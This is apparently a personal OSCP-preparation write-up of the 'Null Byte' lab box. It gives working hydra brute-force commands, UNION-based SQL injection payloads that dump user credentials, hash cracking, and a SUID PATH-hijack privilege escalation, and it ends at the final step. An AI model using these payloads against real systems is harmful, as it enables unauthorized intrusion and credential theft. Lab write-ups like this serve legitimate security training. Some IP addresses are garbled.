Box 3/40
My third writeup for OSCP preparation.
RECONNAISSANCE
It is also called Information Gathering Phase. To gather as much information as possible about the target.
I’ll start off by running an nmap scan: nmap -p- -sS -Pn -n -T4 — min-rate=3000 $RHOST. Nmap discovered the following open ports and services:
sudo nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.203.16Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 11:56 EDT
Warning: 192.168.69.16 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.203.16
Host is up (0.24s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
33872/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Run a comprehensive nmap scan to gather more detailed information about the open ports. It is valuable for an attacker as it provides detailed information on a potential attack vectors into a system.
sudo nmap -p80,111,777,33872 -sC -sV -O -Pn -n 192.168.203.16
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 11:57 EDT
Nmap scan report for 192.168.203.16
Host is up (0.24s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33323/udp status
| 100024 1 33872/tcp status
| 100024 1 43582/udp6 status
|_ 100024 1 57223/tcp6 status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
33872/tcp open status 1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 3.16 (94%), Linux 4.4 (93%), Linux 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 4.9 (90%), Linux 4.2 (90%), Linux 4.8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.31 seconds
ENUMERATION
It is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.
PORT 80 — HTTP
Browse to http://192.168.203.16
Check for hidden directories but there is no interesting result.
Check if there is a hidden message inside of the image. I download the image of the web page and used exiftool. There is an interesting string written in the comment. This could be a password to ssh or a URL hidden directory.
Browse to http://192.168.1203.16/kzMb5nVYJw
Check the source code
Bruteforce attack the key parameter, I used hydra with rockyou.txt wordlist and it gives a password “elite”.
hydra -l a -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 192.168.203.16 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -V -f -t 4By entering any words in the username box it shows a message of fetch data successfully.
By putting or appending double quote (“) in the username box or the usrtosearch parameter shows that it is vulnerable to SQLi.
EXPLOITATION
This is where an attacker/pentester breaks or gain access to the system
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.
Inject UNION SELECT Statement to find the correct number of fields in queries.
Keep incrementing null fields in the payload until a valid query is shown.
AnyWord" UNION SELECT null, null, null; -- -
I used Cheat Sheet from https://github.com/acole76/pentestmonkey-cheatsheets/blob/master/mysql.md to dump sensitive information in MySQL.
Enumerate list of all database, As shown below that there is 5 database.
AnyWord" UNION SELECT null, schema_name, null FROM information_schema.schemata; -- -
Enumerate the tables of the database seth, and as shown below there is 1 table in the seth database.
Enumerate columns in the users table.
AnyWord" UNION SELECT null, column_name, null FROM information_schema.columns WHERE table_schema="seth" AND table_name="users"; -- -
Dump specific columns.
AnyWord" UNION SELECT null, Concat(user, ":", pass), null FROM users; -- -
As shown above, there is a username ramses and a password that seems to be in base64 format. I decoded the password and it gives a md5 hash.
echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
Crack the md5 hash, and this gives us the password of ‘omega’. Connect to ssh in port 777 using ramses:omega.
PRIVILEGE ESCALATION
It is the process of increasing the level of user privileges on a certain host to the highest permission level.
I elevated my privilege by abusing SUID/SGID Permission. SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.
SGID is a special file permission that also applies to executable files and enables other users to inherit the effective GID of file group owner. Likewise, rather than the usual x which represents execute permissions, you will see an s (to indicate SGID) special permission for group user.
If the file is owned by root, it gets executed with root privileges, and may be able to use it to escalate privileges.
To search for SUID/SGID.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Upon checking, procwatch is a binary which runs ps and sh. To elevate the privilege I need to run sh first instead of ps.
Change the executable $PATH, it searches first the executable in /tmp before the default directories.
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/gamesCopy /bin/sh to /tmp as ps
cp /bin/sh /tmp/psRun again procwatch
